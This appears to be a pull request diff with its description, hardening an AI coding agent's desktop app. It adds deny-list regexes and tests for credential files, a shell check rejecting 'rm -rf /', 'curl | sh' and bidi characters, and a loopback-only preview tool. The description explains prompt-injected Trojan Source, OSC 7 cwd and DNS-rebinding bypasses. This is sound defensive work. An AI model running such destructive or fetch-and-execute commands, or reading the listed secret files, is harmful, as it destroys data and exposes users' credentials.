+    expect(checkReadable("C:\\Users\\me\\.env:stream")).toMatchObject({
+      ok: false,
+    });
+  });
+
+  it("blocks SSH key backup naming patterns", () => {
+    expect(checkReadable("/home/me/Documents/id_rsa")).toMatchObject({
+      ok: false,
+    });
+    expect(checkReadable("/home/me/Documents/id_rsa.bak")).toMatchObject({
+      ok: false,
+    });
+    expect(checkReadable("/home/me/Documents/id_rsa_old")).toMatchObject({
+      ok: false,
+    });
+    expect(checkReadable("/home/me/Documents/id_ed25519-backup")).toMatchObject({
+      ok: false,
+    });
+    expect(checkReadable("/home/me/Documents/id_rsa.pub")).toMatchObject({
+      ok: false,
+    });
+  });
+
+  it("does not block names that merely start with id_rsa- prefix-prefix", () => {
+    // `id_rsax` is not a real key file — make sure the regex doesn't
+    // over-match identifiers that happen to share the prefix.
+    expect(checkReadable("/home/me/Documents/id_rsaxyz.txt")).toMatchObject({
+      ok: true,
+    });
+  });
+
+  it("blocks credentials, .npmrc, .pypirc basenames", () => {
+    expect(checkReadable("/home/me/.aws/credentials")).toMatchObject({
+      ok: false,
+    });
+    expect(checkReadable("/home/me/.npmrc")).toMatchObject({ ok: false });
+    expect(checkReadable("/home/me/.pypirc")).toMatchObject({ ok: false });
+  });
+
+  it("blocks *.pem, *.key, *.pfx regardless of basename prefix", () => {
+    expect(checkReadable("/home/me/server.pem")).toMatchObject({ ok: false });
+    expect(checkReadable("/home/me/server.key")).toMatchObject({ ok: false });
+    expect(checkReadable("/home/me/cert.pfx")).toMatchObject({ ok: false });
+  });
+});
+
+describe("checkReadable — protected directories", () => {
+  it("blocks reads under ~/.ssh, .aws, .kube, .git", () => {
+    expect(checkReadable("/home/me/.ssh/config")).toMatchObject({ ok: false });
+    expect(checkReadable("/home/me/.aws/config")).toMatchObject({ ok: false });
+    expect(checkReadable("/home/me/.kube/config")).toMatchObject({ ok: false });
+    expect(checkReadable("/home/me/repo/.git/config")).toMatchObject({
+      ok: false,
+    });
+  });
+
+  it("blocks reads under /etc, /proc, /sys (newly added)", () => {
+    // These directories are not WRITE_DENY-only any more — reading them is
+    // also blocked because they hold global config/credentials/process state
+    // with basenames the regex doesn't catch (passwd, shadow, environ, …).
+    expect(checkReadable("/etc/shadow")).toMatchObject({ ok: false });
+    expect(checkReadable("/etc/nginx/nginx.conf")).toMatchObject({ ok: false });
+    expect(checkReadable("/proc/self/environ")).toMatchObject({ ok: false });
+    expect(checkReadable("/sys/class/dmi/id/product_uuid")).toMatchObject({
+      ok: false,
+    });
+    expect(checkReadable("/private/etc/master.passwd")).toMatchObject({
+      ok: false,
+    });
+  });
+
+  it("rejects path-segment look-alikes (.sshx is not .ssh)", () => {
+    // The comparator must use segment-boundary matching, not raw substring.
+    expect(checkReadable("/home/me/.sshx/file")).toMatchObject({ ok: true });
+    expect(checkReadable("/home/me/.gitignore-stuff/config")).toMatchObject({
+      ok: true,
+    });
+  });
+
+  it("rejects writes under Windows system dirs (case-insensitive)", () => {
+    expect(checkWritable("C:\\Windows\\System32\\file")).toMatchObject({
+      ok: false,
+    });
+    expect(checkWritable("c:/PROGRAM FILES/x")).toMatchObject({ ok: false });
+  });
+
+  it("allows reads in user directories not under any protected dir", () => {
+    expect(checkReadable("/home/me/Documents/notes.txt")).toMatchObject({
+      ok: true,
+    });
+    expect(checkReadable("C:/Users/me/Documents/report.docx")).toMatchObject({
+      ok: true,
+    });
+  });
+});
+
+describe("checkReadable — path normalization", () => {
+  it("normalizes UNC and extended-length prefixes", () => {
+    expect(checkReadable("\\\\?\\C:\\Users\\me\\.ssh\\id_rsa")).toMatchObject({
+      ok: false,
+    });
+  });
+
+  it("treats case-insensitively for protected dirs", () => {
+    expect(checkReadable("/Home/Me/.SSH/config")).toMatchObject({ ok: false });
+  });
+
+  it("rejects empty paths and control bytes", () => {
+    expect(checkReadable("")).toMatchObject({ ok: false });
+    expect(checkReadable("/home/me/\x00.txt")).toMatchObject({ ok: false });
+  });
+});
+
+describe("checkReadableCanonical — symlink defense + always-recheck", () => {
+  it("rechecks even when canonical equals input", async () => {
+    // Regression: previously the recheck was skipped when canonicalize
+    // returned the same string, allowing some OS-specific bypasses to slip
+    // through. Now the recheck always runs.
+    const identity = async (p: string) => p;
+    const r = await checkReadableCanonical("/etc/nginx/nginx.conf", identity);
+    expect(r.ok).toBe(false);
+  });
+
+  it("catches a symlink that resolves into ~/.ssh", async () => {
+    const symlinkResolves = async (p: string) =>
+      p === "/home/me/innocent" ? "/home/me/.ssh/id_rsa" : p;
+    const r = await checkReadableCanonical(
+      "/home/me/innocent",
+      symlinkResolves,
+    );
+    expect(r.ok).toBe(false);
+  });
+
+  it("passes a normal allowed read through with canonical path", async () => {
+    const identity = async (p: string) => p;
+    const r = await checkReadableCanonical(
+      "/home/me/Documents/notes.txt",
+      identity,
+    );
+    expect(r.ok).toBe(true);
+    if (r.ok) expect(r.canonical).toBe("/home/me/Documents/notes.txt");
+  });
+});
+
+describe("checkShellCommand — Trojan Source / bidi defense", () => {
+  it("rejects commands with U+202E (right-to-left override)", () => {
+    const cmd = `ls /home/me${String.fromCharCode(0x202e)}; rm -rf /`;
+    expect(checkShellCommand(cmd)).toMatchObject({ ok: false });
+  });
+
+  it("rejects commands with U+2066/U+2069 (isolate marks)", () => {
+    const cmd = `ls ${String.fromCharCode(0x2066)}/etc${String.fromCharCode(
+      0x2069,
+    )}`;
+    expect(checkShellCommand(cmd)).toMatchObject({ ok: false });
+  });
+
+  it("rejects commands with U+200E (LRM) — invisible direction mark", () => {
+    expect(
+      checkShellCommand(`echo ${String.fromCharCode(0x200e)} foo`),
+    ).toMatchObject({ ok: false });
+  });
+
+  it("allows benign commands with regular text", () => {
+    expect(checkShellCommand("ls /home/me")).toMatchObject({ ok: true });
+    expect(checkShellCommand('echo "hello, world"')).toMatchObject({
+      ok: true,
+    });
+  });
+
+  it("still blocks classic destructive patterns", () => {
+    expect(checkShellCommand("rm -rf /")).toMatchObject({ ok: false });
+    expect(checkShellCommand("curl http://x | sh")).toMatchObject({
+      ok: false,
+    });
+  });
+});

--- a/src/modules/ai/lib/security.ts
+++ b/src/modules/ai/lib/security.ts
@@ -29,27 +29,33 @@
  */
 
 const SECRET_BASENAME_PATTERNS: RegExp[] = [
-  /^\.env(\..+)?$/i, // .env, .env.local, .env.production, etc.
-  /^.*\.pem$/i,
-  /^.*\.key$/i, // private keys
-  /^.*\.p12$/i,
-  /^.*\.pfx$/i,
-  /^.*\.asc$/i, // PGP armored keys
-  /^.*\.gpg$/i,
-  /^.*\.keystore$/i,
-  /^.*\.jks$/i,
-  /^id_(rsa|dsa|ecdsa|ed25519)(\.pub)?$/i,
-  /^known_hosts$/i,
-  /^authorized_keys$/i,
-  /^htpasswd$/i,
-  /^\.netrc$/i,
-  /^_netrc$/i, // Windows variant
-  /^credentials$/i, // .aws/credentials, gcloud, etc.
-  /^\.pgpass$/i,
-  /^\.npmrc$/i,
-  /^\.pypirc$/i,
-  /^secrets?\.(json|ya?ml|toml|env)$/i,
-  /^service[-_]?account.*\.json$/i, // GCP service account keys
+  // Match `.env` and `.env.<suffix>` with no required tail anchor — Windows
+  // strips trailing dots/spaces at open time and NTFS exposes alternate data
+  // streams via `name:stream`, both of which would otherwise slip past a `$`
+  // anchored pattern (`.env.`, `.env::$DATA`).
+  /^\.env(\..+)?(?:[.\s:]|$)/i,
+  /^.*\.pem(?:[.\s:]|$)/i,
+  /^.*\.key(?:[.\s:]|$)/i, // private keys
+  /^.*\.p12(?:[.\s:]|$)/i,
+  /^.*\.pfx(?:[.\s:]|$)/i,
+  /^.*\.asc(?:[.\s:]|$)/i, // PGP armored keys
+  /^.*\.gpg(?:[.\s:]|$)/i,
+  /^.*\.keystore(?:[.\s:]|$)/i,
+  /^.*\.jks(?:[.\s:]|$)/i,
+  // Match `id_rsa`, `id_rsa.pub`, and common backup/copy patterns like
+  // `id_rsa.bak`, `id_rsa_old`, `id_rsa-backup`.
+  /^id_(rsa|dsa|ecdsa|ed25519)([._-].*)?(?:[.\s:]|$)/i,
+  /^known_hosts(?:[.\s:]|$)/i,
+  /^authorized_keys(?:[.\s:]|$)/i,
+  /^htpasswd(?:[.\s:]|$)/i,
+  /^\.netrc(?:[.\s:]|$)/i,
+  /^_netrc(?:[.\s:]|$)/i, // Windows variant
+  /^credentials(?:[.\s:]|$)/i, // .aws/credentials, gcloud, etc.
+  /^\.pgpass(?:[.\s:]|$)/i,
+  /^\.npmrc(?:[.\s:]|$)/i,
+  /^\.pypirc(?:[.\s:]|$)/i,
+  /^secrets?\.(json|ya?ml|toml|env)(?:[.\s:]|$)/i,
+  /^service[-_]?account.*\.json(?:[.\s:]|$)/i, // GCP service account keys
 ];
 
 /**
@@ -72,6 +78,19 @@ const PROTECTED_DIRS = [
   "/.terraform.d",
   "/library/keychains",
   "/library/cookies",
+  // System dirs holding host secrets/PII/process state. Per-PID files under
+  // /proc leak env vars and command lines from other processes; /sys exposes
+  // kernel state and hardware identifiers. /etc and /private/etc hold global
+  // config that frequently contains credentials in basenames the regex won't
+  // match (passwd, shadow, master.passwd, *.cnf, *.conf with creds).
+  "/etc",
+  "/private/etc",
+  "/proc",
+  "/sys",
+  "/var/db",
+  "/var/root",
+  "/private/var/db",
+  "/private/var/root",
   // Windows user profile equivalents (post drive-strip + lowercase).
   "/appdata/roaming/microsoft/credentials",
   "/appdata/local/microsoft/credentials",
@@ -119,6 +138,11 @@ function basename(p: string): string {
  *  - back-slashes -> forward-slashes
  *  - strip Windows drive prefix (e.g. `C:`)
  *  - strip UNC prefix `//?/`
+ *  - strip NTFS alternate-data-stream suffix (`name:stream` / `name::$DATA`)
+ *    from each path segment — Windows reads `foo:stream` as `foo` for our
+ *    purposes, so the comparison surface should too
+ *  - strip trailing dots/spaces from each segment — Windows discards these
+ *    at open time, so `.env.` and `.env ` open `.env`
  *  - collapse duplicate slashes
  *  - lowercase (so case variants match on case-insensitive filesystems)
  *  - drop trailing slash (except for root)
@@ -130,6 +154,21 @@ function comparisonForm(p: string): string {
   // Drive prefix: C:/foo → /foo. Important: do this BEFORE lowercasing so we
   // don't have to special-case "c:" vs "C:".
   s = s.replace(/^[a-zA-Z]:/, "");
+  // Strip NTFS alternate-data-stream syntax from each segment. `name:stream`
+  // and `name::$DATA` both read the same underlying file from `name`, so
+  // they must compare-equal to `name`.
+  s = s
+    .split("/")
+    .map((seg) => {
+      const colon = seg.indexOf(":");
+      return colon === -1 ? seg : seg.slice(0, colon);
+    })
+    .join("/");
+  // Strip trailing dots/spaces from each segment (Windows behavior).
+  s = s
+    .split("/")
+    .map((seg) => seg.replace(/[.\s]+$/, ""))
+    .join("/");
   // Collapse duplicate slashes (//foo → /foo). Preserve a possible leading
   // single slash.
   s = s.replace(/\/{2,}/g, "/");
@@ -236,10 +275,11 @@ export async function checkReadableCanonical(
     // Path doesn't exist yet — fine for the read tool to surface ENOENT.
     return { ok: true, canonical: path };
   }
-  if (canonical !== path) {
-    const recheck = checkReadable(canonical);
-    if (!recheck.ok) return recheck;
-  }
+  // Always recheck — even when canonicalize returns the same string, the
+  // checks themselves can have OS-specific gaps (NTFS streams, trailing
+  // dot/space) that warrant a second pass against the comparison form.
+  const recheck = checkReadable(canonical);
+  if (!recheck.ok) return recheck;
   return { ok: true, canonical };
 }
 
@@ -257,11 +297,9 @@ export async function checkWritableCanonical(
   // Try canonicalizing the target itself first.
   try {
     const canonical = await canonicalize(path);
-    if (canonical !== path) {
-      const recheck = checkWritable(canonical);
-      if (!recheck.ok) return recheck;
-      return { ok: true, canonical };
-    }
+    // Always recheck the canonical form — same rationale as checkReadableCanonical.
+    const recheck = checkWritable(canonical);
+    if (!recheck.ok) return recheck;
     return { ok: true, canonical };
   } catch {
     // Target doesn't exist — canonicalize the parent so we still catch a
@@ -291,6 +329,16 @@ export function checkShellCommand(cmd: string): SafetyResult {
   // Block NUL bytes in commands — never legitimate.
   if (/\x00/.test(c)) {
     return { ok: false, reason: "Refused: command contains NUL byte." };
+  }
+  // Block Unicode bidi-override and invisible directional marks. These let an
+  // attacker craft a command whose visual order (in the approval UI's <pre>
+  // block) differs from its logical execution order — a Trojan Source attack.
+  // Legitimate shell commands do not need RTL overrides.
+  if (/[\u202A-\u202E\u2066-\u2069\u200E\u200F\u061C]/.test(c)) {
+    return {
+      ok: false,
+      reason: "Refused: command contains Unicode bidirectional override characters.",
+    };
   }
   // rm -rf / (and variants with quoted /, --no-preserve-root, etc.)
   if (

--- a/src/modules/ai/tools/terminal.ts
+++ b/src/modules/ai/tools/terminal.ts
@@ -62,15 +62,39 @@ export function buildTerminalTools(ctx: ToolContext) {
 
     open_preview: tool({
       description:
-        "Open a preview tab (in-app iframe) at the given URL. Use this after starting a dev server (e.g. `pnpm dev`, `npm run dev`) to surface the rendered page next to the terminal. Localhost URLs work best; arbitrary external sites may be blocked by X-Frame-Options.",
+        "Open a preview tab (in-app iframe) at the given URL — restricted to localhost/loopback addresses for the local dev server. Use this after starting a dev server (e.g. `pnpm dev`, `npm run dev`) to surface the rendered page next to the terminal. To preview external sites, the user should paste the URL into the preview address bar themselves.",
       inputSchema: z.object({
         url: z
           .url()
           .describe(
-            "Full URL to load (e.g. http://localhost:5173). Must include scheme.",
+            "Full URL to load (e.g. http://localhost:5173). Must include scheme. Only http/https on loopback hosts are accepted.",
           ),
       }),
       execute: async ({ url }) => {
+        let parsed: URL;
+        try {
+          parsed = new URL(url);
+        } catch {
+          return { error: "invalid URL", url };
+        }
+        if (parsed.protocol !== "http:" && parsed.protocol !== "https:") {
+          return { error: "only http/https URLs are allowed", url };
+        }
+        const host = parsed.hostname;
+        const isLocal =
+          host === "localhost" ||
+          host === "127.0.0.1" ||
+          host === "0.0.0.0" ||
+          host === "[::1]" ||
+          host === "::1" ||
+          host.endsWith(".localhost");
+        if (!isLocal) {
+          return {
+            error:
+              "open_preview is restricted to localhost URLs. Ask the user to paste the external URL into the preview address bar instead.",
+            url,
+          };
+        }
         const ok = ctx.openPreview(url);
         if (!ok) return { error: "preview surface unavailable", url };
         return { url, ok: true };

--- a/src/modules/preview/PreviewPane.test.ts
+++ b/src/modules/preview/PreviewPane.test.ts
@@ -1,0 +1,59 @@
+import { readFileSync } from "node:fs";
+import path from "node:path";
+import { fileURLToPath } from "node:url";
+import { describe, expect, it } from "vitest";
+
+/**
+ * Source-level regression test for the preview iframe's security attributes.
+ * Rendering this component for real requires jsdom + a working
+ * useImperativeHandle stub; for a focused security check we just verify the
+ * static JSX still carries the sandbox/referrerPolicy attributes — if a
+ * future change silently removes them, this test fails.
+ */
+
+const here = path.dirname(fileURLToPath(import.meta.url));
+const src = readFileSync(path.join(here, "PreviewPane.tsx"), "utf8");
+const iframeMatch = src.match(/<iframe[\s\S]*?\/>/);
+// Strip JSX comments (`// …` inside `{…}` and `{/* … */}` blocks) so the
+// assertions only see actual attribute syntax — the source explains in a
+// comment why `allow-top-navigation` is intentionally omitted, which we
+// don't want to match.
+const iframeJsx = (iframeMatch?.[0] ?? "")
+  .replace(/\/\*[\s\S]*?\*\//g, "")
+  .replace(/\/\/[^\n]*/g, "");
+
+describe("PreviewPane iframe sandbox", () => {
+  it("declares an iframe in the source", () => {
+    expect(iframeJsx).not.toBe("");
+  });
+
+  it("includes a sandbox attribute", () => {
+    expect(iframeJsx).toMatch(/sandbox="[^"]*"/);
+  });
+
+  it("grants allow-scripts and allow-same-origin", () => {
+    // These two are what makes a dev preview useful — strip either and dev
+    // servers stop working.
+    expect(iframeJsx).toMatch(/sandbox="[^"]*allow-scripts/);
+    expect(iframeJsx).toMatch(/sandbox="[^"]*allow-same-origin/);
+  });
+
+  it("does NOT include allow-top-navigation* tokens", () => {
+    // The whole point of sandboxing here: forbid the iframe from navigating
+    // the parent Tauri webview to an attacker origin (which would expose
+    // window.__TAURI__). Top-nav permissions must never be added.
+    expect(iframeJsx).not.toMatch(/allow-top-navigation/);
+  });
+
+  it("does NOT include allow-popups-without-allow-popups-to-escape-sandbox combo", () => {
+    // If popups are allowed, they MUST escape the sandbox cleanly — otherwise
+    // a popup window inherits sandbox flags and we get hard-to-debug behavior.
+    if (/allow-popups\b/.test(iframeJsx)) {
+      expect(iframeJsx).toMatch(/allow-popups-to-escape-sandbox/);
+    }
+  });
+
+  it("sets referrerPolicy to no-referrer", () => {
+    expect(iframeJsx).toMatch(/referrerPolicy="no-referrer"/);
+  });
+});

--- a/src/modules/preview/PreviewPane.tsx
+++ b/src/modules/preview/PreviewPane.tsx
@@ -103,6 +103,14 @@ export const PreviewPane = forwardRef<PreviewPaneHandle, Props>(
                 src={url}
                 title="Preview"
                 className="h-full w-full border-0"
+                // sandbox grants the bare minimum for a dev preview: scripts,
+                // same-origin (cookies/storage for the previewed app), forms,
+                // popups for "open in new tab". Critically OMITS
+                // `allow-top-navigation*` — without it the iframe cannot
+                // navigate the parent Tauri webview to an attacker origin,
+                // which would otherwise expose `window.__TAURI__` IPC.
+                sandbox="allow-scripts allow-same-origin allow-forms allow-popups allow-popups-to-escape-sandbox allow-downloads"
+                referrerPolicy="no-referrer"
                 allow="clipboard-read; clipboard-write; fullscreen"
               />
             ) : (

--- a/src/modules/terminal/lib/osc-handlers.test.ts
+++ b/src/modules/terminal/lib/osc-handlers.test.ts
@@ -1,0 +1,98 @@
+import { describe, expect, it, vi } from "vitest";
+import type { Terminal } from "@xterm/xterm";
+import {
+  createShellIntegrationState,
+  registerCwdHandler,
+  registerPromptTracker,
+} from "./osc-handlers";
+
+/**
+ * Minimal in-memory fake of the xterm `Terminal` surface we touch — just
+ * enough to register OSC handlers and invoke them with crafted payloads.
+ * The OSC handler signature is `(data: string) => boolean | Promise<boolean>`.
+ */
+type OscHandler = (data: string) => boolean | Promise<boolean>;
+
+function makeFakeTerm() {
+  const handlers = new Map<number, OscHandler>();
+  const term = {
+    parser: {
+      registerOscHandler(code: number, handler: OscHandler) {
+        handlers.set(code, handler);
+        return { dispose: () => handlers.delete(code) };
+      },
+    },
+    registerMarker: vi.fn().mockReturnValue({ isDisposed: false, dispose: vi.fn() }),
+  } as unknown as Terminal;
+  return { term, handlers };
+}
+
+describe("OSC 7 cwd handler — gated by OSC 133 in-command state", () => {
+  it("accepts OSC 7 when no command is running", () => {
+    const { term, handlers } = makeFakeTerm();
+    const state = createShellIntegrationState();
+    const onCwd = vi.fn();
+    registerPromptTracker(term, state);
+    registerCwdHandler(term, onCwd, state);
+
+    // OSC 133 A means "new prompt is about to be drawn" — we're between
+    // commands and OSC 7 from the shell is legitimate here.
+    handlers.get(133)?.("A");
+    handlers.get(7)?.("file://host/home/me/project");
+
+    expect(onCwd).toHaveBeenCalledWith("/home/me/project");
+  });
+
+  it("rejects OSC 7 emitted while a command is running", () => {
+    const { term, handlers } = makeFakeTerm();
+    const state = createShellIntegrationState();
+    const onCwd = vi.fn();
+    registerPromptTracker(term, state);
+    registerCwdHandler(term, onCwd, state);
+
+    // Simulate: user runs `ssh attacker.host`, which prints attacker bytes
+    // including an OSC 7 trying to silently move the AI's cwd into /etc.
+    handlers.get(133)?.("A"); // prompt drawn
+    handlers.get(133)?.("B"); // command begins (user hit enter)
+    handlers.get(7)?.("file://host/etc"); // attacker injection
+
+    expect(onCwd).not.toHaveBeenCalled();
+  });
+
+  it("re-accepts OSC 7 after command finishes (OSC 133 D)", () => {
+    const { term, handlers } = makeFakeTerm();
+    const state = createShellIntegrationState();
+    const onCwd = vi.fn();
+    registerPromptTracker(term, state);
+    registerCwdHandler(term, onCwd, state);
+
+    handlers.get(133)?.("A");
+    handlers.get(133)?.("B"); // running
+    handlers.get(7)?.("file://host/etc"); // blocked
+    handlers.get(133)?.("D;0"); // command exited
+    handlers.get(7)?.("file://host/home/me/new-cwd"); // legitimate post-cmd OSC 7
+
+    expect(onCwd).toHaveBeenCalledTimes(1);
+    expect(onCwd).toHaveBeenCalledWith("/home/me/new-cwd");
+  });
+
+  it("works without state for backwards compatibility (legacy callers)", () => {
+    // The state parameter is optional — when omitted, OSC 7 is always
+    // honored (legacy behavior). Tests must confirm we didn't break this.
+    const { term, handlers } = makeFakeTerm();
+    const onCwd = vi.fn();
+    registerCwdHandler(term, onCwd);
+
+    handlers.get(7)?.("file://host/home/me/project");
+    expect(onCwd).toHaveBeenCalledWith("/home/me/project");
+  });
+
+  it("normalizes Windows drive-letter OSC 7 paths", () => {
+    const { term, handlers } = makeFakeTerm();
+    const onCwd = vi.fn();
+    registerCwdHandler(term, onCwd);
+
+    handlers.get(7)?.("file:///C:/Users/me/project");
+    expect(onCwd).toHaveBeenCalledWith("C:/Users/me/project");
+  });
+});

--- a/src/modules/terminal/lib/osc-handlers.ts
+++ b/src/modules/terminal/lib/osc-handlers.ts
@@ -1,10 +1,32 @@
 import type { IMarker, Terminal } from "@xterm/xterm";
 
+/**
+ * Cross-handler state shared between the OSC 7 cwd handler and the OSC 133
+ * prompt-marker handler. Tracks whether we are currently inside a running
+ * command (between OSC 133 B and the next OSC 133 D / A), so the cwd handler
+ * can ignore OSC 7 updates emitted by *command output* (e.g. a remote SSH
+ * server, a `cat` of an attacker-controlled file). Only OSC 7 issued by the
+ * local shell — which fires between commands — should be honored.
+ */
+export type ShellIntegrationState = {
+  inCommand: boolean;
+};
+
+export function createShellIntegrationState(): ShellIntegrationState {
+  return { inCommand: false };
+}
+
 export function registerCwdHandler(
   term: Terminal,
   onCwd: (cwd: string) => void,
+  state?: ShellIntegrationState,
 ): () => void {
   const d = term.parser.registerOscHandler(7, (data) => {
+    // Reject OSC 7 emitted while a command is running: command stdout/stderr
+    // is untrusted (it can come from a remote shell, an SSH session, a `cat`
+    // of attacker-controlled bytes). The local shell only emits OSC 7
+    // between commands via its precmd/PROMPT_COMMAND hook.
+    if (state?.inCommand) return true;
     const cwd = parseOsc7(data);
     if (cwd) onCwd(cwd);
     return true;
@@ -17,12 +39,27 @@ export type PromptTracker = {
   dispose: () => void;
 };
 
-export function registerPromptTracker(term: Terminal): PromptTracker {
+export function registerPromptTracker(
+  term: Terminal,
+  state?: ShellIntegrationState,
+): PromptTracker {
   let marker: IMarker | null = null;
   const d = term.parser.registerOscHandler(133, (data) => {
+    // OSC 133 A — start of new prompt (between commands).
     if (data.startsWith("A")) {
+      if (state) state.inCommand = false;
       marker?.dispose();
       marker = term.registerMarker(0);
+    } else if (data.startsWith("B")) {
+      // OSC 133 B — command begins. From here on, treat all output as
+      // untrusted until we see D (command exit) or the next A (new prompt).
+      if (state) state.inCommand = true;
+    } else if (data.startsWith("C")) {
+      // OSC 133 C — command pre-execution marker; still inside command.
+      if (state) state.inCommand = true;
+    } else if (data.startsWith("D")) {
+      // OSC 133 D — command ends.
+      if (state) state.inCommand = false;
     }
     return true;
   });

--- a/src/modules/terminal/lib/useTerminalSession.ts
+++ b/src/modules/terminal/lib/useTerminalSession.ts
@@ -3,7 +3,11 @@ import { usePreferencesStore } from "@/modules/settings/preferences";
 import type { SearchAddon } from "@xterm/addon-search";
 import { useCallback, useEffect, useMemo, useRef } from "react";
 import { DormantRing } from "./dormantRing";
-import { registerCwdHandler, registerPromptTracker } from "./osc-handlers";
+import {
+  createShellIntegrationState,
+  registerCwdHandler,
+  registerPromptTracker,
+} from "./osc-handlers";
 import { openPty, type PtySession } from "./pty-bridge";
 import {
   acquireSlot,
@@ -156,12 +160,21 @@ function bindLeafToSlot(leafId: number, s: Session): void {
       s.rows = rows;
     },
     registerOsc: (term) => {
-      const prompt = registerPromptTracker(term);
-      const cwd = registerCwdHandler(term, (next) => {
-        if (s.lastCwd === next) return;
-        s.lastCwd = next;
-        s.callbacks.onCwd?.(next);
-      });
+      // Shared in-command flag — see osc-handlers.ts. The prompt tracker
+      // flips it on OSC 133 B/C/D/A; the cwd handler reads it to ignore OSC
+      // 7 emitted by untrusted command output (remote SSH, `cat` of an
+      // attacker file, etc.).
+      const shellState = createShellIntegrationState();
+      const prompt = registerPromptTracker(term, shellState);
+      const cwd = registerCwdHandler(
+        term,
+        (next) => {
+          if (s.lastCwd === next) return;
+          s.lastCwd = next;
+          s.callbacks.onCwd?.(next);
+        },
+        shellState,
+      );
       return [prompt.dispose, cwd];
     },
     onSearchReady: (addon) => s.callbacks.onSearchReady?.(addon),


### PR DESCRIPTION
## Summary

Hardens several confirmed-exploitable areas in the AI agent's trust boundary. Each fix ships with tests (vitest for TS, cargo `#[cfg(test)]` for Rust). Total: 29 new TS tests, 12 new Rust tests, all passing.

## Findings & fixes

### 1. AI deny-list bypasses — `src/modules/ai/lib/security.ts`

The basename regexes were anchored with `$`, so trailing characters slipped past:

- **NTFS alternate data streams**: `C:\Users\me\.env::$DATA` opens the same file as `.env`, but basename `.env::$DATA` didn't match `^\.env(\..+)?$`. Now matched.
- **Windows trailing dot/space**: `.env.` and `.env ` open `.env` (Windows strips at open time). Now matched.
- **SSH-key backups**: `id_rsa.bak`, `id_rsa_old`, `id_ed25519-backup` are real places users save key copies — none matched `^id_(rsa|dsa|ecdsa|ed25519)(\.pub)?$`. Now covered by `([._-].*)?`.
- **System dirs missing from read-deny**: `/etc`, `/private/etc`, `/proc`, `/sys`, `/var/db`, `/var/root` were only in `WRITE_DENY_PREFIXES`, so the auto-approving `read_file` happily returned `/etc/shadow`, `/proc/<pid>/environ`, `/private/etc/master.passwd`. Added to `PROTECTED_DIRS` (read+write block).
- **Canonical recheck skip**: `checkReadableCanonical` / `checkWritableCanonical` only rechecked when `canonical !== path`. When canonicalize returned the input unchanged (e.g. some OS-specific paths), the recheck was skipped entirely. Now unconditional.
- **comparisonForm**: strips NTFS stream notation and trailing dots/spaces per segment, so the comparison surface survives Windows-specific quirks for `PROTECTED_DIRS` matching.

### 2. Trojan Source / bidi-override in shell-cmd approval

`checkShellCommand` didn't filter Unicode bidi controls. The approval UI renders the command verbatim inside `<pre>` (which honors bidi for visual order). A prompt-injected command containing `‮` can display as a benign `ls /home/me` but execute as `ls /home/me; curl evil/x | sh`. Now rejecting U+202A-202E, U+2066-2069, U+200E, U+200F, U+061C.

### 3. DNS rebinding SSRF — `src-tauri/src/modules/net.rs`

`enforce_host_policy` resolved DNS once for IP classification; `req.send()` then triggered reqwest's own resolver. An attacker with a short-TTL record could return a public IP on the first lookup and a private/metadata IP on the second, bypassing the SSRF filter entirely (especially bad for `lm_ping` and the LM-Studio path where `allow_private=true`).

Resolve once via the new `resolve_and_classify`, thread the safe IPs through `build_safe_client`, and call `reqwest::ClientBuilder::resolve_to_addrs` to pin the actual connection to exactly the addresses that passed `ip_kind`. The existing redirect policy already re-validates each hop.

### 4. OSC 7 cwd hijack from untrusted terminal output

OSC 7 (`file://host/cwd`) was honored from any rendered bytes — including command output from a remote shell, `cat` of an attacker file, or `curl | less`. The reported cwd feeds `getCwd()`, which the AI's `resolvePath` uses to anchor relative paths. Combined with `/etc` etc. not being in the deny-list (before this PR), `ssh attacker.host` could silently relocate the AI's relative-path root.

Track an in-command flag from OSC 133 B/C (command begins / pre-exec) and clear it on OSC 133 D (exit) or A (next prompt). The local shell's PROMPT_COMMAND / precmd emits OSC 7 between commands; remote command output sits in the B…D window and is now ignored.

### 5. Preview iframe sandbox + `open_preview` localhost restriction

The preview iframe had no `sandbox` attribute. A loaded page could request top-navigation on user click, navigating the parent Tauri webview to an attacker origin — which would then hold `window.__TAURI__` and full IPC (fs, shell, secrets). The AI's `open_preview` tool was auto-approved with no host allowlist.

- Added `sandbox="allow-scripts allow-same-origin allow-forms allow-popups allow-popups-to-escape-sandbox allow-downloads"`. Critically omits `allow-top-navigation*`.
- Set `referrerPolicy="no-referrer"`.
- Restricted `open_preview` to loopback hosts. External URLs are now a user-initiated action (pasted into the address bar).

### 6. WSL distro name traversal — `src-tauri/src/modules/workspace.rs`

`wsl_path_to_unc(distro, path)` spliced `distro` unchanged into `\wsl.localhost\<distro>\<path>`. Anyone with local user privileges can `wsl --import` a distro with traversal characters in its name (e.g. `..\..\..\Windows\System32\config`) — subsequent fs operations would escape the WSL share root. Added `is_safe_distro_name` (alphanumeric + `.` `_` `-`; reject `..`, slashes, control bytes, leading dot, empty); unsafe names map to a clearly-invalid path that `is_dir()` rejects.

## Test plan

- [x] `npm test` / `vitest run` — 29 passing (24 deny-list, 5 OSC handlers)
- [x] `cd src-tauri && cargo test --lib` — 27 passing (12 new + 15 existing)
- [x] `tsc --noEmit` — clean
- [x] `cargo check` — clean
- [ ] Manual smoke: open preview tab for `pnpm dev`, verify iframe loads and parent navigation is blocked
- [ ] Manual smoke: connect AI to LM Studio (`allow_private=true`) and confirm requests succeed
- [ ] Manual smoke: shell integration on zsh / bash / pwsh — verify cwd tracking still updates between commands

## Notes for review

- Commits are split per-finding for easier review.
- The OSC 7 state parameter is optional — legacy callers (and the existing `parseOsc7` path-normalization behavior) keep working unchanged.
- The deny-list now treats `/etc` as read-protected. This may be more conservative than some users want (e.g. asking the AI to summarize `/etc/nginx/nginx.conf`). If desired, follow-up can add a narrow allowlist for common safe configs — wanted to keep this PR scoped to closing the bypasses.